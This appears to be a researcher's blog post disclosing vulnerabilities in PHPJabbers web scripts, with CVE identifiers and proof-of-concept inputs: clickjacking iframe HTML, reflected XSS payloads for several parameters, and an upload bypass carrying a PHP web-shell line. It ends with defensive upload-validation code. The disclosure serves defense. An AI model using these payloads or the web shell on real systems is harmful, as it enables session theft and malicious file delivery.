Today, I want to follow up on the previous post (https://medium.com/@mfortinsec/multiple-vulnerabilities-in-phpjabbers-part-1-6703becb4cd4) with some additional vulnerabilities discovered through a recent collaborative security research project. This was done through a local group called the Atlantic CyberSecurity Collective.

Our team, consisting of a diverse and talented group of researchers, has conducted an extensive security review on the PHPJabbers collection of scripts, and during our research, we came across some significant security vulnerabilities. It’s worth mentioning that these vulnerabilities, if exploited, could potentially pose serious threats to user data and the overall integrity of these products. We submitted our findings to MITRE, a globally recognized cybersecurity standards organization. Consequently, these vulnerabilities were validated and assigned the following Common Vulnerabilities and Exposures (CVE) identifiers:

  • CVE-2023-38830
  • CVE-2023-39796
  • CVE-2023-39770
  • CVE-2023-39771
  • CVE-2023-39773
  • CVE-2023-39774
  • CVE-2023-39775
  • CVE-2023-39776

Note that we are all professionals with full-time jobs and other responsibilities. With the sheer number of products in the PHP Jabbers lineup and the limited time available, we weren't able to assess every single product. There is a lot of code reuse across those applications, so it is safe to assume most of these vulnerabilities are present in other products as well.

Members of the research group conducted some additional research in PHP Jabbers products and found vulnerabilities which aren’t addressed in this disclosure.

We informed the PHP Jabbers team through their online forms, but were completely ignored. Each of our attempts at communicating these vulnerabilities was met with silence and an almost instantaneous “closed” status to our submitted tickets.

Our intentions behind sharing this information aren’t to tarnish the vendor’s reputation or stir up panic among its user base. Instead, we aim to encourage proactive and transparent collaboration within the cybersecurity community. It’s crucial to remember that we all share the same goal — enhancing the overall security of products and fostering a safer digital world for users.

In the sections to follow, we will delve into each of the identified vulnerabilities:

#1: PII disclosure in Yacht Listing Script

(CVE-2023-38830)

The rentals information can be exported from the application.

In the exported CSV we can see full credit card numbers along with their expiration date, 3-digit PIN and more…

#2: Clickjacking in Car Rental Script

(CVE-2023-39769)

The HTML below demonstrates a simple clickjacking proof of concept: the target page is loaded in a nearly transparent iframe layered over a decoy element, so a click on the decoy lands on the framed page.

<style>
  /* framed target page, almost invisible, on top of the decoy */
  iframe { position: relative; width: 500px; height: 500px; opacity: 0.1; z-index: 2; }
  /* decoy element the user thinks they are clicking */
  div { position: absolute; top: 100px; left: 100px; z-index: 1; }
</style>
<div>Test me</div>
<iframe src="https://demo.phpjabbers.com/DEMO_ID/index.php?controller=pjBaseCron&action=pjActionIndex"></iframe>

#3: Reflected XSS in the theme parameter of Car Rental Script

(CVE-2023-39770)

Replace the theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so

#4: Reflected XSS in the theme parameter of Taxi Booking Script

(CVE-2023-39771)

Replace the theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so

#5: Reflected XSS in the theme parameter of Restaurant Booking System

(CVE-2023-39773)

Replace the theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so

#6: Reflected XSS in the theme parameter of Event Booking Calendar

(CVE-2023-39774)

Replace the theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so

#7: Reflected XSS in the cid parameter of Hotel Booking Script

(CVE-2023-39775)

Replace the cid parameter value with the following payload: r5wx9%22%3e%3cscript%3ealert('BCK')%3c%2fscript%3edv7zh

#8: Unrestricted File Upload in Ticket Support Script

(CVE-2023-39776)

Upload a file that passes the front-end file extension validation (such as a PDF, PNG or JPG) and capture the request.

In the captured request, change the filename to another extension and set the Content-Type header to a value matching that extension.

Content-Disposition: form-data; name="files[]"; filename="boat.php"
Content-Type: application/x-www-form-urlencoded

<?php system($_GET['cmd']); ?>

Now, if we go to the admin panel under Tickets and open the ticket we sent, we can see that our PHP file was successfully uploaded. This DOES NOT enable RCE, as the file is simply downloaded, but it could be abused to deliver potentially harmful files such as malware to the administrators who open the ticket.
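The root cause above is that the extension check lives only in the front end, and the Content-Type header is attacker-controlled. As an added example (my own code, not PHPJabbers' fix), the validation below shows the server-side policy a defender would apply: an extension allowlist matching the front-end rule (PDF, PNG, JPG), a magic-byte check of the actual bytes, a server-generated storage name, and no reliance on the client's Content-Type. The signatures, filename rule and sample inputs are constructed assumptions.

```python
import os
import re
import secrets

# Allowlisted extensions and the leading bytes a genuine file of that type carries.
# Constructed for this example; mirrors the front-end rule described in the post.
ALLOWED = {
    "pdf": [b"%PDF-"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
}

# Stem may contain only safe characters: no dots, so "boat.php.png" is refused.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(client_filename: str, client_content_type: str, data: bytes) -> tuple[bool, str]:
    """Decide whether an uploaded part is accepted; returns (accepted, reason).

    client_content_type is deliberately unused: the header is chosen by the sender
    (the post shows it set to application/x-www-form-urlencoded for a .php body),
    so the decision rests on the extension allowlist and the file's own bytes.
    """
    base = os.path.basename(client_filename)  # drop any path component
    stem, _, ext = base.rpartition(".")
    ext = ext.lower()
    if not stem or not SAFE_STEM.match(stem):
        return False, "unsafe filename"
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(client_filename: str) -> str:
    """Server-generated name for an accepted file: random stem, validated extension only."""
    ext = os.path.basename(client_filename).rpartition(".")[2].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed cases: the post's bypass request, a renamed script, and a genuine PNG.
    print(validate_upload("boat.php", "application/x-www-form-urlencoded", b"<?php system($_GET['cmd']); ?>"))
    print(validate_upload("shell.png", "image/png", b"<?php system($_GET['cmd']); ?>"))
    print(validate_upload("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
```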
